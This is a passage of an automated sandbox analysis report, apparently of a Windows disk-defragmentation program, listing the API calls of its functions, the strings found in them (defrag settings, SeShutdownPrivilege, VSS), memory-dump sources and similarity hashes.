                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,00421972), ref: 0041E100
                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00421972), ref: 0041E107
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041E124
• AdjustTokenPrivileges.ADVAPI32 ref: 0041E148
• GetLastError.KERNEL32 ref: 0041E14E
• ExitWindowsEx.USER32(00000001,80020003), ref: 0041E16E
Strings
Memory Dump Source
• Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_111392827.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
APIs
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?), ref: 0045A8C2
• GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A915
• FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0045A955
• FindClose.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?), ref: 0045A9AA
• GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A9CE
Strings
Memory Dump Source
• Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_111392827.jbxd
Similarity
• API ID: DiskFreeSpace$Find$CloseFileFirst
• String ID: %c:\
• API String ID: 281833627-3142399695
APIs
• FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
• FindNextFileW.KERNEL32(?,00000003,?), ref: 00463410
• FindClose.KERNEL32(?), ref: 0046342D
Strings
Memory Dump Source
• Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_111392827.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID: %s%s\$%s*
• API String ID: 3541575487-790581550
APIs
• IsDebuggerPresent.KERNEL32 ref: 00473B49
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00473B5E
• UnhandledExceptionFilter.KERNEL32(0047CF54), ref: 00473B69
• GetCurrentProcess.KERNEL32(C0000409), ref: 00473B85
• TerminateProcess.KERNEL32(00000000), ref: 00473B8C
Memory Dump Source
• Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_111392827.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                                • Instruction ID: 5fbb9a2fc2dc4524adccc28e56c0de5744acadb4307870d4d3e04b8eaaabc2f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E421E3B8828204DFC700DFA5FC856853BA4FB28329F5040BBE80D87762E77466848F5D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2631854093.0000000000609000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                                • Instruction ID: 7f45a62b763b18ee1db0e3ef6cde993bceb0ffd0ff8c50725b501db6588a7515
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AF06275A50200EFC718DF0AC544CD677F7EB857107654595D4049B3A2D3B0DE45CB70
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(00000000), ref: 0042872A
                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00428751
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401099,0047D9D0,0047D9D0,0047D9D0,0047D9D0,00000000), ref: 00428778
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008022,00000000), ref: 0042878F
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401128,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004287AA
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008027,00000000), ref: 004287BB
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401127,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004287D6
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008028,00000000), ref: 004287E7
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004287F6
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401032,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 00428811
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008023,00000000), ref: 00428822
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401033,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 0042883D
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008024,00000000), ref: 0042884E
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(3401086,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 00428869
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008025,00000000), ref: 0042887A
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00428889
                                                                                                                                                                                                                                                                                                • #8.OLEAUT32(10021,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004288A4
                                                                                                                                                                                                                                                                                                • AppendMenuW.USER32(?,00000000,00008026,00000000), ref: 004288B5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$Append$CreateCursorPopup
                                                                                                                                                                                                                                                                                                • String ID: 10021$3401032$3401033$3401086$3401099$3401127$3401128
                                                                                                                                                                                                                                                                                                • API String ID: 2468982102-1766060818
                                                                                                                                                                                                                                                                                                • Opcode ID: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                                • Instruction ID: 3f46f92896953761dbd981ebaed820fc3143a3776dcc1953a56c74fff761f47c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9319DF5BD030076D2A066A58D57F9A76A99F84F00F31C80BB74E769C1CAECB4045BAD
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,00094658), ref: 0041DB8A
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A9B0: SHGetFileInfoW.SHELL32(%SystemRoot%,00000040,000002B4,000002B4,00004011), ref: 0041A9DA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000001,00000000), ref: 00402370
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402590: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004023B9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402660: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BitmapDriveDrivesFileInfoLoadLogicalType
                                                                                                                                                                                                                                                                                                • String ID: 3402003$3402041$3402043$3402046$3402047$3402048$8F$CPUIdleTime$CPUUsageExceed$DefragmentedFiles$DiskDefrag\AutoDefragmention$LastDefragmention$tG
                                                                                                                                                                                                                                                                                                • API String ID: 3599163918-1643340582
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                                • Instruction ID: bcfd938aa366970316b1685172ea95c37501a647d75b412e58de97171c7dff61
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4A1D9B17503006BD710FF618D86FAE36A89F44714F10892EF60E7B2D2DABCA844875E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,20000000,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4C2
                                                                                                                                                                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,VSS,00000034,?,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4DD
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4EA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: OpenService$CloseHandleManager
                                                                                                                                                                                                                                                                                                • String ID: 0N$VSS
                                                                                                                                                                                                                                                                                                • API String ID: 4136619037-702027763
                                                                                                                                                                                                                                                                                                • Opcode ID: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                                • Instruction ID: e3fabb29cb39525be17c5613465a7dd84fffe719b6809a75a20e2f83d6b45fa7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6631E932601314A7D610EBA8AC80FFB775DEB45365F84083FF904D2251DB19E98987EA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetComboBoxInfo.USER32 ref: 00416520
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0041654D
                                                                                                                                                                                                                                                                                                • GetMapMode.GDI32(?,00000000), ref: 00416561
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041658E
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004165AA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004165D5
                                                                                                                                                                                                                                                                                                • OpenThemeData.UXTHEME(?,COMBOBOX,?,00FFFFFF,00000000,00000000), ref: 00416607
                                                                                                                                                                                                                                                                                                • DrawThemeBackground.UXTHEME(00000000,?,00000005,00000003,?,00000000), ref: 00416652
                                                                                                                                                                                                                                                                                                • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000001,?,00000000), ref: 0041666C
                                                                                                                                                                                                                                                                                                • CloseThemeData.UXTHEME(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00416673
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041668C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004166A3
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004167D1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00416DD0: CopyRect.USER32(?,?), ref: 00416E1C
                                                                                                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 0041681A
                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 0041683E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RectTheme$MessageSend$BackgroundCompatibleCopyCreateDataDraw$BitmapClientCloseComboFrameInfoModeOpen
                                                                                                                                                                                                                                                                                                • String ID: 4$8F$COMBOBOX
                                                                                                                                                                                                                                                                                                • API String ID: 3327461832-961196532
                                                                                                                                                                                                                                                                                                • Opcode ID: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                                • Instruction ID: 20267cedc47a1196732836afe1a8f8ceed4fa11fcf58e3e8436092e3fc6905d6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BC138B1508300AFD314DF65C985FABB7E8BF88704F008A1EF58997291DB74E944CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,0000FFFE), ref: 00432329
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041D2E0: #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Optimize\OptimizeList,?,?,?,?,00427EC2,BB40E64E), ref: 0041D36A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041D2E0: #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D397
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,?), ref: 00432523
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402006$3402028$3402029$3402030$3402031$3402032$3402033$3402034$3402035$3402036$3402037$8F$`=
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3242431549
                                                                                                                                                                                                                                                                                                • Opcode ID: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                                • Instruction ID: 1f5745e592a7c845df3e12826af7c739e18eef66d9bd278cacb692334ad6c886
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1A194B0B50301ABD310AF658D82FAE73A5AF48B04F10491FFA5EB76D1D7A8BD00965D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004217C5
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0042187C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 00421890
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004218A6
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 004218BC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00421580: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,004217B6,?,BB40E64E), ref: 004215AC
                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004218F0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CountRedrawTickWindow
                                                                                                                                                                                                                                                                                                • String ID: 3401097$8F$ScheduleStart$`=
                                                                                                                                                                                                                                                                                                • API String ID: 1016491994-1295084991
                                                                                                                                                                                                                                                                                                • Opcode ID: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                                • Instruction ID: a2f7d2ab4a79c621e2b3341a28b2bdd177a5bb8c7450e01432b01053e343f094
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FB117717003119BC720EF64DCC5FAA77A5AF94710F50493EF9099B2E1DB78A844CBAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GdipGetImagePixelFormat.GDIPLUS(?,?), ref: 00401593
                                                                                                                                                                                                                                                                                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004015F2
                                                                                                                                                                                                                                                                                                • GdipGetImageWidth.GDIPLUS(?,?,?,?,?,?), ref: 00401613
                                                                                                                                                                                                                                                                                                • GdipGetImagePaletteSize.GDIPLUS(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040165A
                                                                                                                                                                                                                                                                                                • GdipGetImagePalette.GDIPLUS(?,00000008,?,80070057,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 004016CF
                                                                                                                                                                                                                                                                                                • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040177B
                                                                                                                                                                                                                                                                                                • GdipBitmapUnlockBits.GDIPLUS(?,?,?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004017F1
                                                                                                                                                                                                                                                                                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00401817
                                                                                                                                                                                                                                                                                                • GdipGetImageGraphicsContext.GDIPLUS(?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?), ref: 0040182D
                                                                                                                                                                                                                                                                                                • GdipDrawImageI.GDIPLUS(00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?), ref: 00401840
                                                                                                                                                                                                                                                                                                • GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?), ref: 00401846
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?), ref: 0040184C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Gdip$Image$Bitmap$BitsGraphicsPalette$ContextCreateDeleteDisposeDrawFormatFromHeightLockPixelScan0SizeUnlockWidth
                                                                                                                                                                                                                                                                                                • String ID: &$>=
                                                                                                                                                                                                                                                                                                • API String ID: 1279047860-1654677323
                                                                                                                                                                                                                                                                                                • Opcode ID: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                                • Instruction ID: 8a788743ff85fe53078408617ba339fa43619964413e8471535d34c3641ef31a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66A175B1E002059FDB14DF95D881AAFB7B5EF88304F14852EE919BB351D738E941CBA8
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000,BB40E64E,00094658,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00419894
                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 004198B6
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
